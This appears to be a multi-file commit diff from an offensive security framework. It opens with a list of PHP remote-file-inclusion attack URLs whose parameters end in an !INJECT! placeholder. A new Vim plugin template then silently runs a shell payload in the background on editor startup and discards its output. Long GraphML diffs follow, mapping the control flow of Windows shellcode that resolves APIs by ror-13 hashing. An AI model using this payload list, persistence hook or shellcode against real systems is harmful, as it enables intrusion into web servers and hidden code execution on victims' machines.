/web/submit_comment.php?path_prefix=!INJECT!
/webavis/class/class.php?root=!INJECT!?
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=!INJECT!
/webnews/template.php?content_page=!INJECT!?
/webroot/css.php?CONFIGS=!INJECT!
/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=!INJECT!
/webyep-system/programm/webyep.php?webyep_sIncludePath=!INJECT!?
/window.php?action=!INJECT!
/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=!INJECT!?
/work/index.php?g_include=!INJECT!
/work/module/forum/forum.php?g_include=!INJECT!
/worldpay_notify.php?mosConfig_absolute_path=!INJECT!
/wp-cache-phase1.php?plugin=!INJECT!
/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
/wp-content/plugins/myflash/myflash-button.php?wpPATH=!INJECT!
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=!INJECT!
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=!INJECT!?
/wsk/wsk.php?wsk=!INJECT!
/xarg_corner.php?xarg=!INJECT!?
/xarg_corner_bottom.php?xarg=!INJECT!?
/xarg_corner_top.php?xarg=!INJECT!?
/xoopsgallery/init_basic.php?GALLERY_BASEDIR=!INJECT!?&2093085906=1&995617320=2
/xt_counter.php?server_base_dir=!INJECT!
/yabbse/Sources/Packages.php?sourcedir=!INJECT!
/yacs/scripts/update_trailer.php?context[path_to_root]=!INJECT!?
/yrch/plugins/metasearch/plug.inc.php?path=!INJECT!
/ytb/cuenta/cuerpo.php?base_archivo=!INJECT!
/zipndownload.php?PP_PATH=!INJECT!?
/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=!INJECT!?
+11
View File
@@ -0,0 +1,11 @@
" NAME.vim - Runs in the background on startup, discards output
if !has('job') || exists('g:loaded_ZZWcUtfrDa')
finish
endif
let g:loaded_NAME = 1
augroup NAME
autocmd!
autocmd VimEnter * silent! call job_start(["/bin/sh", "-c", "PAYLOAD_PLACEHOLDER"], {'out_io': 'null', 'err_io': 'null'})
augroup END
+157 -164
View File
@@ -90,350 +90,343 @@
<node id="block.0x1017:instruction.0x101b">
<data key="address">0x101b</data>
<data key="type">instruction</data>
<data key="instruction.hex">480fb74a4a</data>
<data key="instruction.source">movzx rcx, word ptr [rdx + 0x4a]</data>
<data key="instruction.hex">480fb74a48</data>
<data key="instruction.source">movzx rcx, word ptr [rdx + 0x48]</data>
</node>
<node id="block.0x1017:instruction.0x1020">
<data key="address">0x1020</data>
<data key="type">instruction</data>
<data key="instruction.hex">4d31c9</data>
<data key="instruction.source">xor r9, r9</data>
<data key="instruction.hex">41b900000000</data>
<data key="instruction.source">mov r9d, 0</data>
</node>
</graph>
</node>
<node id="block.0x1023">
<data key="address">0x1023</data>
<node id="block.0x1026">
<data key="address">0x1026</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1023</data>
<data key="address">0x1026</data>
<data key="type">block</data>
<node id="block.0x1023:instruction.0x1023">
<data key="address">0x1023</data>
<node id="block.0x1026:instruction.0x1026">
<data key="address">0x1026</data>
<data key="type">instruction</data>
<data key="instruction.hex">4831c0</data>
<data key="instruction.source">xor rax, rax</data>
</node>
<node id="block.0x1023:instruction.0x1026">
<data key="address">0x1026</data>
<node id="block.0x1026:instruction.0x1029">
<data key="address">0x1029</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [rsi]</data>
</node>
<node id="block.0x1023:instruction.0x1027">
<data key="address">0x1027</data>
<node id="block.0x1026:instruction.0x102a">
<data key="address">0x102a</data>
<data key="type">instruction</data>
<data key="instruction.hex">3c61</data>
<data key="instruction.source">cmp al, 0x61</data>
</node>
<node id="block.0x1023:instruction.0x1029">
<data key="address">0x1029</data>
<node id="block.0x1026:instruction.0x102c">
<data key="address">0x102c</data>
<data key="type">instruction</data>
<data key="instruction.hex">7c02</data>
<data key="instruction.source">jl 0x102d</data>
<data key="instruction.source">jl 0x1030</data>
</node>
<edge source="block.0x1023:instruction.0x1023" target="block.0x1023:instruction.0x1026"/>
<edge source="block.0x1023:instruction.0x1026" target="block.0x1023:instruction.0x1027"/>
<edge source="block.0x1023:instruction.0x1027" target="block.0x1023:instruction.0x1029"/>
<edge source="block.0x1026:instruction.0x1026" target="block.0x1026:instruction.0x1029"/>
<edge source="block.0x1026:instruction.0x1029" target="block.0x1026:instruction.0x102a"/>
<edge source="block.0x1026:instruction.0x102a" target="block.0x1026:instruction.0x102c"/>
</graph>
</node>
<node id="block.0x102b">
<data key="address">0x102b</data>
<node id="block.0x102e">
<data key="address">0x102e</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x102b</data>
<data key="address">0x102e</data>
<data key="type">block</data>
<node id="block.0x102b:instruction.0x102b">
<data key="address">0x102b</data>
<node id="block.0x102e:instruction.0x102e">
<data key="address">0x102e</data>
<data key="type">instruction</data>
<data key="instruction.hex">2c20</data>
<data key="instruction.source">sub al, 0x20</data>
</node>
</graph>
</node>
<node id="block.0x102d">
<data key="address">0x102d</data>
<node id="block.0x1030">
<data key="address">0x1030</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x102d</data>
<data key="address">0x1030</data>
<data key="type">block</data>
<node id="block.0x102d:instruction.0x102d">
<data key="address">0x102d</data>
<node id="block.0x1030:instruction.0x1030">
<data key="address">0x1030</data>
<data key="type">instruction</data>
<data key="instruction.hex">41c1c90d</data>
<data key="instruction.source">ror r9d, 0xd</data>
</node>
<node id="block.0x102d:instruction.0x1031">
<data key="address">0x1031</data>
<node id="block.0x1030:instruction.0x1034">
<data key="address">0x1034</data>
<data key="type">instruction</data>
<data key="instruction.hex">4101c1</data>
<data key="instruction.source">add r9d, eax</data>
</node>
<node id="block.0x102d:instruction.0x1034">
<data key="address">0x1034</data>
<node id="block.0x1030:instruction.0x1037">
<data key="address">0x1037</data>
<data key="type">instruction</data>
<data key="instruction.hex">e2ed</data>
<data key="instruction.source">loop 0x1023</data>
<data key="instruction.source">loop 0x1026</data>
</node>
<edge source="block.0x102d:instruction.0x102d" target="block.0x102d:instruction.0x1031"/>
<edge source="block.0x102d:instruction.0x1031" target="block.0x102d:instruction.0x1034"/>
<edge source="block.0x1030:instruction.0x1030" target="block.0x1030:instruction.0x1034"/>
<edge source="block.0x1030:instruction.0x1034" target="block.0x1030:instruction.0x1037"/>
</graph>
</node>
<node id="block.0x1036">
<data key="address">0x1036</data>
<node id="block.0x1039">
<data key="address">0x1039</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1036</data>
<data key="address">0x1039</data>
<data key="type">block</data>
<node id="block.0x1036:instruction.0x1036">
<data key="address">0x1036</data>
<node id="block.0x1039:instruction.0x1039">
<data key="address">0x1039</data>
<data key="type">instruction</data>
<data key="instruction.hex">52</data>
<data key="instruction.source">push rdx</data>
</node>
<node id="block.0x1036:instruction.0x1037">
<data key="address">0x1037</data>
<node id="block.0x1039:instruction.0x103a">
<data key="address">0x103a</data>
<data key="type">instruction</data>
<data key="instruction.hex">4151</data>
<data key="instruction.source">push r9</data>
</node>
<node id="block.0x1036:instruction.0x1039">
<data key="address">0x1039</data>
<node id="block.0x1039:instruction.0x103c">
<data key="address">0x103c</data>
<data key="type">instruction</data>
<data key="instruction.hex">488b5220</data>
<data key="instruction.source">mov rdx, qword ptr [rdx + 0x20]</data>
</node>
<node id="block.0x1036:instruction.0x103d">
<data key="address">0x103d</data>
<node id="block.0x1039:instruction.0x1040">
<data key="address">0x1040</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b423c</data>
<data key="instruction.source">mov eax, dword ptr [rdx + 0x3c]</data>
</node>
<node id="block.0x1036:instruction.0x1040">
<data key="address">0x1040</data>
<node id="block.0x1039:instruction.0x1043">
<data key="address">0x1043</data>
<data key="type">instruction</data>
<data key="instruction.hex">4801d0</data>
<data key="instruction.source">add rax, rdx</data>
</node>
<node id="block.0x1036:instruction.0x1043">
<data key="address">0x1043</data>
<node id="block.0x1039:instruction.0x1046">
<data key="address">0x1046</data>
<data key="type">instruction</data>
<data key="instruction.hex">668178180b02</data>
<data key="instruction.source">cmp word ptr [rax + 0x18], 0x20b</data>
</node>
<node id="block.0x1036:instruction.0x1049">
<data key="address">0x1049</data>
<node id="block.0x1039:instruction.0x104c">
<data key="address">0x104c</data>
<data key="type">instruction</data>
<data key="instruction.hex">7572</data>
<data key="instruction.hex">756f</data>
<data key="instruction.source">jne 0x10bd</data>
</node>
<edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1039"/>
<edge source="block.0x1036:instruction.0x1036" target="block.0x1036:instruction.0x1037"/>
<edge source="block.0x1036:instruction.0x1037" target="block.0x1036:instruction.0x1049"/>
<edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x103d"/>
<edge source="block.0x1036:instruction.0x1039" target="block.0x1036:instruction.0x1040"/>
<edge source="block.0x1036:instruction.0x103d" target="block.0x1036:instruction.0x1040"/>
<edge source="block.0x1036:instruction.0x1040" target="block.0x1036:instruction.0x1043"/>
<edge source="block.0x1036:instruction.0x1043" target="block.0x1036:instruction.0x1049"/>
<edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103c"/>
<edge source="block.0x1039:instruction.0x1039" target="block.0x1039:instruction.0x103a"/>
<edge source="block.0x1039:instruction.0x103a" target="block.0x1039:instruction.0x104c"/>
<edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1040"/>
<edge source="block.0x1039:instruction.0x103c" target="block.0x1039:instruction.0x1043"/>
<edge source="block.0x1039:instruction.0x1040" target="block.0x1039:instruction.0x1043"/>
<edge source="block.0x1039:instruction.0x1043" target="block.0x1039:instruction.0x1046"/>
<edge source="block.0x1039:instruction.0x1046" target="block.0x1039:instruction.0x104c"/>
</graph>
</node>
<node id="block.0x104b">
<data key="address">0x104b</data>
<node id="block.0x104e">
<data key="address">0x104e</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x104b</data>
<data key="address">0x104e</data>
<data key="type">block</data>
<node id="block.0x104b:instruction.0x104b">
<data key="address">0x104b</data>
<node id="block.0x104e:instruction.0x104e">
<data key="address">0x104e</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b8088000000</data>
<data key="instruction.source">mov eax, dword ptr [rax + 0x88]</data>
</node>
<node id="block.0x104b:instruction.0x1051">
<data key="address">0x1051</data>
<node id="block.0x104e:instruction.0x1054">
<data key="address">0x1054</data>
<data key="type">instruction</data>
<data key="instruction.hex">4885c0</data>
<data key="instruction.source">test rax, rax</data>
</node>
<node id="block.0x104b:instruction.0x1054">
<data key="address">0x1054</data>
<node id="block.0x104e:instruction.0x1057">
<data key="address">0x1057</data>
<data key="type">instruction</data>
<data key="instruction.hex">7467</data>
<data key="instruction.hex">7464</data>
<data key="instruction.source">je 0x10bd</data>
</node>
<edge source="block.0x104b:instruction.0x104b" target="block.0x104b:instruction.0x1051"/>
<edge source="block.0x104b:instruction.0x1051" target="block.0x104b:instruction.0x1054"/>
<edge source="block.0x104e:instruction.0x104e" target="block.0x104e:instruction.0x1054"/>
<edge source="block.0x104e:instruction.0x1054" target="block.0x104e:instruction.0x1057"/>
</graph>
</node>
<node id="block.0x1056">
<data key="address">0x1056</data>
<node id="block.0x1059">
<data key="address">0x1059</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1056</data>
<data key="address">0x1059</data>
<data key="type">block</data>
<node id="block.0x1056:instruction.0x1056">
<data key="address">0x1056</data>
<node id="block.0x1059:instruction.0x1059">
<data key="address">0x1059</data>
<data key="type">instruction</data>
<data key="instruction.hex">4801d0</data>
<data key="instruction.source">add rax, rdx</data>
</node>
<node id="block.0x1056:instruction.0x1059">
<data key="address">0x1059</data>
<node id="block.0x1059:instruction.0x105c">
<data key="address">0x105c</data>
<data key="type">instruction</data>
<data key="instruction.hex">50</data>
<data key="instruction.source">push rax</data>
</node>
<node id="block.0x1056:instruction.0x105a">
<data key="address">0x105a</data>
<node id="block.0x1059:instruction.0x105d">
<data key="address">0x105d</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b4818</data>
<data key="instruction.source">mov ecx, dword ptr [rax + 0x18]</data>
</node>
<node id="block.0x1056:instruction.0x105d">
<data key="address">0x105d</data>
<node id="block.0x1059:instruction.0x1060">
<data key="address">0x1060</data>
<data key="type">instruction</data>
<data key="instruction.hex">448b4020</data>
<data key="instruction.source">mov r8d, dword ptr [rax + 0x20]</data>
</node>
<node id="block.0x1056:instruction.0x1061">
<data key="address">0x1061</data>
<node id="block.0x1059:instruction.0x1064">
<data key="address">0x1064</data>
<data key="type">instruction</data>
<data key="instruction.hex">4901d0</data>
<data key="instruction.source">add r8, rdx</data>
</node>
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x1059"/>
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105a"/>
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105d"/>
<edge source="block.0x1056:instruction.0x105d" target="block.0x1056:instruction.0x1061"/>
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105c"/>
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105d"/>
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x1060"/>
<edge source="block.0x1059:instruction.0x1060" target="block.0x1059:instruction.0x1064"/>
</graph>
</node>
<node id="block.0x1064">
<data key="address">0x1064</data>
<node id="block.0x1067">
<data key="address">0x1067</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1064</data>
<data key="address">0x1067</data>
<data key="type">block</data>
<node id="block.0x1064:instruction.0x1064">
<data key="address">0x1064</data>
<node id="block.0x1067:instruction.0x1067">
<data key="address">0x1067</data>
<data key="type">instruction</data>
<data key="instruction.hex">e356</data>
<data key="instruction.hex">e353</data>
<data key="instruction.source">jrcxz 0x10bc</data>
</node>
</graph>
</node>
<node id="block.0x1066">
<data key="address">0x1066</data>
<node id="block.0x1069">
<data key="address">0x1069</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1066</data>
<data key="address">0x1069</data>
<data key="type">block</data>
<node id="block.0x1066:instruction.0x1066">
<data key="address">0x1066</data>
<node id="block.0x1069:instruction.0x1069">
<data key="address">0x1069</data>
<data key="type">instruction</data>
<data key="instruction.hex">48ffc9</data>
<data key="instruction.source">dec rcx</data>
</node>
<node id="block.0x1066:instruction.0x1069">
<data key="address">0x1069</data>
<node id="block.0x1069:instruction.0x106c">
<data key="address">0x106c</data>
<data key="type">instruction</data>
<data key="instruction.hex">418b3488</data>
<data key="instruction.source">mov esi, dword ptr [r8 + rcx*4]</data>
</node>
<node id="block.0x1066:instruction.0x106d">
<data key="address">0x106d</data>
<node id="block.0x1069:instruction.0x1070">
<data key="address">0x1070</data>
<data key="type">instruction</data>
<data key="instruction.hex">4801d6</data>
<data key="instruction.source">add rsi, rdx</data>
</node>
<node id="block.0x1066:instruction.0x1070">
<data key="address">0x1070</data>
<node id="block.0x1069:instruction.0x1073">
<data key="address">0x1073</data>
<data key="type">instruction</data>
<data key="instruction.hex">4d31c9</data>
<data key="instruction.source">xor r9, r9</data>
<data key="instruction.hex">448b4c2408</data>
<data key="instruction.source">mov r9d, dword ptr [rsp + 8]</data>
</node>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x106d"/>
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1069"/>
<edge source="block.0x1066:instruction.0x1069" target="block.0x1066:instruction.0x106d"/>
<edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x1070"/>
<edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x106c"/>
<edge source="block.0x1069:instruction.0x106c" target="block.0x1069:instruction.0x1070"/>
</graph>
</node>
<node id="block.0x1073">
<data key="address">0x1073</data>
<node id="block.0x1078">
<data key="address">0x1078</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1073</data>
<data key="address">0x1078</data>
<data key="type">block</data>
<node id="block.0x1073:instruction.0x1073">
<data key="address">0x1073</data>
<node id="block.0x1078:instruction.0x1078">
<data key="address">0x1078</data>
<data key="type">instruction</data>
<data key="instruction.hex">4831c0</data>
<data key="instruction.source">xor rax, rax</data>
</node>
<node id="block.0x1073:instruction.0x1076">
<data key="address">0x1076</data>
<node id="block.0x1078:instruction.0x107b">
<data key="address">0x107b</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [rsi]</data>
</node>
<node id="block.0x1073:instruction.0x1077">
<data key="address">0x1077</data>
<node id="block.0x1078:instruction.0x107c">
<data key="address">0x107c</data>
<data key="type">instruction</data>
<data key="instruction.hex">41c1c90d</data>
<data key="instruction.source">ror r9d, 0xd</data>
</node>
<node id="block.0x1073:instruction.0x107b">
<data key="address">0x107b</data>
<node id="block.0x1078:instruction.0x1080">
<data key="address">0x1080</data>
<data key="type">instruction</data>
<data key="instruction.hex">4101c1</data>
<data key="instruction.source">add r9d, eax</data>
</node>
<node id="block.0x1073:instruction.0x107e">
<data key="address">0x107e</data>
<node id="block.0x1078:instruction.0x1083">
<data key="address">0x1083</data>
<data key="type">instruction</data>
<data key="instruction.hex">38e0</data>
<data key="instruction.source">cmp al, ah</data>
</node>
<node id="block.0x1073:instruction.0x1080">
<data key="address">0x1080</data>
<node id="block.0x1078:instruction.0x1085">
<data key="address">0x1085</data>
<data key="type">instruction</data>
<data key="instruction.hex">75f1</data>
<data key="instruction.source">jne 0x1073</data>
<data key="instruction.source">jne 0x1078</data>
</node>
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1076"/>
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1077"/>
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x107e"/>
<edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107b"/>
<edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107e"/>
<edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x107b"/>
<edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x1080"/>
<edge source="block.0x1073:instruction.0x107b" target="block.0x1073:instruction.0x107e"/>
<edge source="block.0x1073:instruction.0x107e" target="block.0x1073:instruction.0x1080"/>
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107b"/>
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107c"/>
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x1083"/>
<edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1080"/>
<edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1083"/>
<edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1080"/>
<edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1085"/>
<edge source="block.0x1078:instruction.0x1080" target="block.0x1078:instruction.0x1083"/>
<edge source="block.0x1078:instruction.0x1083" target="block.0x1078:instruction.0x1085"/>
</graph>
</node>
<node id="block.0x1082">
<data key="address">0x1082</data>
<node id="block.0x1087">
<data key="address">0x1087</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1082</data>
<data key="address">0x1087</data>
<data key="type">block</data>
<node id="block.0x1082:instruction.0x1082">
<data key="address">0x1082</data>
<data key="type">instruction</data>
<data key="instruction.hex">4c034c2408</data>
<data key="instruction.source">add r9, qword ptr [rsp + 8]</data>
</node>
<node id="block.0x1082:instruction.0x1087">
<node id="block.0x1087:instruction.0x1087">
<data key="address">0x1087</data>
<data key="type">instruction</data>
<data key="instruction.hex">4539d1</data>
<data key="instruction.source">cmp r9d, r10d</data>
</node>
<node id="block.0x1082:instruction.0x108a">
<node id="block.0x1087:instruction.0x108a">
<data key="address">0x108a</data>
<data key="type">instruction</data>
<data key="instruction.hex">75d8</data>
<data key="instruction.source">jne 0x1064</data>
<data key="instruction.hex">75db</data>
<data key="instruction.source">jne 0x1067</data>
</node>
<edge source="block.0x1082:instruction.0x1082" target="block.0x1082:instruction.0x1087"/>
<edge source="block.0x1082:instruction.0x1087" target="block.0x1082:instruction.0x108a"/>
<edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x108a"/>
</graph>
</node>
<node id="block.0x108c">
@@ -640,17 +633,17 @@
</graph>
</node>
<edge source="block.0x1000" target="block.0x1017"/>
<edge source="block.0x1017" target="block.0x1023"/>
<edge source="block.0x1023" target="block.0x102b"/>
<edge source="block.0x102b" target="block.0x102d"/>
<edge source="block.0x102d" target="block.0x1036"/>
<edge source="block.0x1036" target="block.0x104b"/>
<edge source="block.0x104b" target="block.0x1056"/>
<edge source="block.0x1056" target="block.0x1064"/>
<edge source="block.0x1064" target="block.0x1066"/>
<edge source="block.0x1066" target="block.0x1073"/>
<edge source="block.0x1073" target="block.0x1082"/>
<edge source="block.0x1082" target="block.0x108c"/>
<edge source="block.0x1017" target="block.0x1026"/>
<edge source="block.0x1026" target="block.0x102e"/>
<edge source="block.0x102e" target="block.0x1030"/>
<edge source="block.0x1030" target="block.0x1039"/>
<edge source="block.0x1039" target="block.0x104e"/>
<edge source="block.0x104e" target="block.0x1059"/>
<edge source="block.0x1059" target="block.0x1067"/>
<edge source="block.0x1067" target="block.0x1069"/>
<edge source="block.0x1069" target="block.0x1078"/>
<edge source="block.0x1078" target="block.0x1087"/>
<edge source="block.0x1087" target="block.0x108c"/>
<edge source="block.0x108c" target="block.0x10bc"/>
<edge source="block.0x10bc" target="block.0x10bd"/>
</graph>
+251 -258
View File
@@ -69,492 +69,471 @@
<node id="block.0x100f:instruction.0x1012">
<data key="address">0x1012</data>
<data key="type">instruction</data>
<data key="instruction.hex">0fb74a26</data>
<data key="instruction.source">movzx ecx, word ptr [edx + 0x26]</data>
<data key="instruction.hex">0fb74a24</data>
<data key="instruction.source">movzx ecx, word ptr [edx + 0x24]</data>
</node>
<node id="block.0x100f:instruction.0x1016">
<data key="address">0x1016</data>
<data key="type">instruction</data>
<data key="instruction.hex">31ff</data>
<data key="instruction.source">xor edi, edi</data>
<data key="instruction.hex">bf00000000</data>
<data key="instruction.source">mov edi, 0</data>
</node>
</graph>
</node>
<node id="block.0x1018">
<data key="address">0x1018</data>
<node id="block.0x101b">
<data key="address">0x101b</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1018</data>
<data key="address">0x101b</data>
<data key="type">block</data>
<node id="block.0x1018:instruction.0x1018">
<data key="address">0x1018</data>
<node id="block.0x101b:instruction.0x101b">
<data key="address">0x101b</data>
<data key="type">instruction</data>
<data key="instruction.hex">31c0</data>
<data key="instruction.source">xor eax, eax</data>
</node>
<node id="block.0x1018:instruction.0x101a">
<data key="address">0x101a</data>
<node id="block.0x101b:instruction.0x101d">
<data key="address">0x101d</data>
<data key="type">instruction</data>
<data key="instruction.hex">ac</data>
<data key="instruction.source">lodsb al, byte ptr [esi]</data>
</node>
<node id="block.0x1018:instruction.0x101b">
<data key="address">0x101b</data>
<node id="block.0x101b:instruction.0x101e">
<data key="address">0x101e</data>
<data key="type">instruction</data>
<data key="instruction.hex">3c61</data>
<data key="instruction.source">cmp al, 0x61</data>
</node>
<node id="block.0x1018:instruction.0x101d">
<data key="address">0x101d</data>
<node id="block.0x101b:instruction.0x1020">
<data key="address">0x1020</data>
<data key="type">instruction</data>
<data key="instruction.hex">7c02</data>
<data key="instruction.source">jl 0x1021</data>
<data key="instruction.source">jl 0x1024</data>
</node>
<edge source="block.0x1018:instruction.0x1018" target="block.0x1018:instruction.0x101a"/>
<edge source="block.0x1018:instruction.0x101a" target="block.0x1018:instruction.0x101b"/>
<edge source="block.0x1018:instruction.0x101b" target="block.0x1018:instruction.0x101d"/>
<edge source="block.0x101b:instruction.0x101b" target="block.0x101b:instruction.0x101d"/>
<edge source="block.0x101b:instruction.0x101d" target="block.0x101b:instruction.0x101e"/>
<edge source="block.0x101b:instruction.0x101e" target="block.0x101b:instruction.0x1020"/>
</graph>
</node>
<node id="block.0x101f">
<data key="address">0x101f</data>
<node id="block.0x1022">
<data key="address">0x1022</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x101f</data>
<data key="address">0x1022</data>
<data key="type">block</data>
<node id="block.0x101f:instruction.0x101f">
<data key="address">0x101f</data>
<node id="block.0x1022:instruction.0x1022">
<data key="address">0x1022</data>
<data key="type">instruction</data>
<data key="instruction.hex">2c20</data>
<data key="instruction.source">sub al, 0x20</data>
</node>
</graph>
</node>
<node id="block.0x1021">
<data key="address">0x1021</data>
<node id="block.0x1024">
<data key="address">0x1024</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1021</data>
<data key="address">0x1024</data>
<data key="type">block</data>
<node id="block.0x1021:instruction.0x1021">
<data key="address">0x1021</data>
<node id="block.0x1024:instruction.0x1024">
<data key="address">0x1024</data>
<data key="type">instruction</data>
<data key="instruction.hex">c1cf0d</data>
<data key="instruction.source">ror edi, 0xd</data>
</node>
<node id="block.0x1021:instruction.0x1024">
<data key="address">0x1024</data>
<node id="block.0x1024:instruction.0x1027">
<data key="address">0x1027</data>
<data key="type">instruction</data>
<data key="instruction.hex">01c7</data>
<data key="instruction.source">add edi, eax</data>
</node>
<node id="block.0x1021:instruction.0x1026">
<data key="address">0x1026</data>
<node id="block.0x1024:instruction.0x1029">
<data key="address">0x1029</data>
<data key="type">instruction</data>
<data key="instruction.hex">49</data>
<data key="instruction.source">dec ecx</data>
</node>
<node id="block.0x1021:instruction.0x1027">
<data key="address">0x1027</data>
<node id="block.0x1024:instruction.0x102a">
<data key="address">0x102a</data>
<data key="type">instruction</data>
<data key="instruction.hex">75ef</data>
<data key="instruction.source">jne 0x1018</data>
<data key="instruction.source">jne 0x101b</data>
</node>
<edge source="block.0x1021:instruction.0x1021" target="block.0x1021:instruction.0x1024"/>
<edge source="block.0x1021:instruction.0x1024" target="block.0x1021:instruction.0x1026"/>
<edge source="block.0x1021:instruction.0x1026" target="block.0x1021:instruction.0x1027"/>
<edge source="block.0x1024:instruction.0x1024" target="block.0x1024:instruction.0x1027"/>
<edge source="block.0x1024:instruction.0x1027" target="block.0x1024:instruction.0x1029"/>
<edge source="block.0x1024:instruction.0x1029" target="block.0x1024:instruction.0x102a"/>
</graph>
</node>
<node id="block.0x1029">
<data key="address">0x1029</data>
<node id="block.0x102c">
<data key="address">0x102c</data>
<data key="type">block</data>
<graph edgedefault="directed">
<data key="address">0x1029</data>
<data key="address">0x102c</data>
<data key="type">block</data>
<node id="block.0x1029:instruction.0x1029">
<data key="address">0x1029</data>
<node id="block.0x102c:instruction.0x102c">
<data key="address">0x102c</data>
<data key="type">instruction</data>
<data key="instruction.hex">52</data>
<data key="instruction.source">push edx</data>
</node>
<node id="block.0x1029:instruction.0x102a">
<data key="address">0x102a</data>
<node id="block.0x102c:instruction.0x102d">
<data key="address">0x102d</data>
<data key="type">instruction</data>
<data key="instruction.hex">57</data>
<data key="instruction.source">push edi</data>
</node>
<node id="block.0x1029:instruction.0x102b">
<data key="address">0x102b</data>
<node id="block.0x102c:instruction.0x102e">
<data key="address">0x102e</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b5210</data>
<data key="instruction.source">mov edx, dword ptr [edx + 0x10]</data>
</node>
<node id="block.0x1029:instruction.0x102e">
<data key="address">0x102e</data>
<node id="block.0x102c:instruction.0x1031">
<data key="address">0x1031</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b423c</data>
<data key="instruction.source">mov eax, dword ptr [edx + 0x3c]</data>
</node>
<node id="block.0x1029:instruction.0x1031">
<data key="address">0x1031</data>
<node id="block.0x102c:instruction.0x1034">
<data key="address">0x1034</data>
<data key="type">instruction</data>
<data key="instruction.hex">01d0</data>
<data key="instruction.source">add eax, edx</data>
</node>
<node id="block.0x1029:instruction.0x1033">
<data key="address">0x1033</data>
<node id="block.0x102c:instruction.0x1036">
<data key="address">0x1036</data>
<data key="type">instruction</data>
<data key="instruction.hex">8b4078</data>
<data key="instruction.source">mov eax, dword ptr [eax + 0x78]</data>
</node>
<node id="block.0x1029:instruction.0x1036">
<data key="address">0x1036</data>
<node id="block.0x102c:instruction.0x1039">
<data key="address">0x1039</data>
<data key="type">instruction</data>
<data key="instruction.hex">85c0</data>
<data key="instruction.source">test eax, eax</data>
</node>
<node id="block.0x1029:instruction.0x1038">
<data key="address">0x1038</data>
<node id="block.0x102c:instruction.0x103b">
<data key="address">0x103b</data>
<data key="type">instruction</data>
<data key="instruction.hex">744c</data>
<data key="instruction.source">je 0x1086</data>
<data key="instruction.hex">744a</data>
<data key="instruction.source">je 0x1087</data>
</node>
<edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102a"/>
<edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102b"/>
<edge source="block.0x1029:instruction.0x102a" target="block.0x1029:instruction.0x1038"/>
<edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x102e"/>
<edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x1031"/>
<edge source="block.0x1029:instruction.0x102e" target="block.0x1029:instruction.0x1031"/>
<edge source="block.0x1029:instruction.0x1031" target="block.0x1029:instruction.0x1033"/>
<edge source="block.0x1029:instruction.0x1033" target="block.0x1029:instruction.0x1036"/>
<edge source="block.0x1029:instruction.0x1036" target="block.0x1029:instruction.0x1038"/>
<edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102d"/>
